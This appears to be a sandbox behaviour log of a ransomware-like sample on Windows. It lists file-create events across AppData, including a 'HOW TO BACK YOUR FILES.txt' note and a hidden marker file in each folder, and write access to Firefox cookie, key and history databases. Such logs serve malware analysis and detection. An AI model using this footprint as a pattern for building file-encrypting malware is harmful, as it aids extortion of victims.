Create C:\Users\FD1HVy\AppData\Roaming\TuYd5M_4-oyQb.ods desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\V4Td8ZSwiEkT0.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\XkvuMMsv206RYIIfQX.flv desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\y4rKx2VEQaUc.bmp desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\yAdKv7OjIt.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\_lYb0S3w_SO.xls desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\SiteSecurityServiceState.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\times.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\webappsstore.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\xulstore.json desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\.metadata-v2 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\.metadata-v2 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\storage\permanent\chrome\idb\2918063365piupsah.files\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\previous.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\upgrade.js-20170824053622 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionstore-backups\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\saved-telemetry-pings\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\minidumps\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
